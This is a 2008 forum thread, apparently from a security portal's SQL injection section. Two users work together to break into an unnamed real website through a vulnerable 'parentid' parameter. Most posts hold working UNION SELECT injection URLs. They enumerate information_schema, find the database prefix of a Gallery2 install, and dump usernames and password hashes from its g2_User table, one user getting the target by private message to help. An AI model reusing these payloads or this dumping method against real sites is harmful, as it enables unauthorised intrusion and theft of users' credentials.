 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL Injection Issue |
 |
 Posted: Fri Jul 11, 2008 1:42 pm |
 |
|
| Henderson |
| Valuable expert |
 |
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
 |
|
 |
|
I recently found an SQL Injection on some site. MySQL version on the server is 5.0.x so information_schema table exists.
| Code: | | http://***********.org/kom.php?akcja=dodaj&parentid=0+UNION+SELECT+1,UNHEX(HEX(table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.tables+LIMIT+1+OFFSET+67/* |
By looking through tables I found a table called g2_User. Querying google for the table name revealed that I'm dealing with a script called Gallery2. The problem is that whenever I try to SELECT FROM table g2_User, it returns invalid MySQL result.
| Code: | | http://***********.org/kom.php?akcja=dodaj&parentid=0+UNION+SELECT+1,UNHEX(HEX(concat_ws(0x3a,g_userName,g_hashedPassword))),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+g2_User/* |
Same happens with all tables with g2_ prefix. Why?
I can give site via PM.
Thanks in advance. |
|
Last edited by Henderson on Fri Jul 11, 2008 4:00 pm; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Fri Jul 11, 2008 2:53 pm |
|
|
| epro |
| Regular user |
|
|
| Joined: Feb 11, 2008 |
| Posts: 24 |
|
|
|
|
|
|
|
Maybe thers prefix.. :/
If you give me site via PM, I can try some injections to see, are there prefix or not.. :/ |
|
|
|
|
| Posted: Fri Jul 11, 2008 3:47 pm |
|
|
| Henderson |
| Valuable expert |
|
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
Ok, sending you the site.
Btw, I've also tried
| Code: | | http://***********.org/kom.php?akcja=dodaj&parentid=0+UNION+SELECT+1,UNHEX(HEX(database())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* |
and then
| Code: | | http://***********.org/kom.php?akcja=dodaj&parentid=0+UNION+SELECT+1,UNHEX(HEX(concat_ws(0x3a,g_userName,g_hashedPassword))),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+databasename.g2_User/* |
but it didn't work as well. |
|
|
|
|
|
|
|
|
| Posted: Fri Jul 11, 2008 5:07 pm |
|
|
| epro |
| Regular user |
|
|
| Joined: Feb 11, 2008 |
| Posts: 24 |
|
|
|
|
|
|
|
OK, I already thought so.
So:
with this injection, I found that the prefix for g2_User is creatiff.
| Code: | | http://*****.org/kom.php?akcja=dodaj&parentid=0+union+select+1,UNHEX(HEX(table_schema)),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x67325f55736572/* |
Then another injection to find user:
| Code: | | http://*****.org/kom.php?akcja=dodaj&parentid=0+UNION+SELECT+1,UNHEX(HEX(concat_ws(0x3a,g_userName,g_hashedPassword))),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+creatiff.g2_User+limit+1,2/* |
Changing code will display you other users... 
But where are that Gallery2, you need to find your own, because there are ~17 sites on this server, so look where are that Gallery2.. 
Good luck.. |
|
|
|
|
| Posted: Sat Jul 12, 2008 11:13 am |
|
|
| Henderson |
| Valuable expert |
|
|
| Joined: Jul 11, 2008 |
| Posts: 58 |
|
|
|
|
|
|
|
| Thank you |
|
|
|
|
| Posted: Wed Sep 17, 2008 3:06 pm |
|
|
| Sven17 |
| Regular user |
|
|
| Joined: Aug 01, 2008 |
| Posts: 8 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
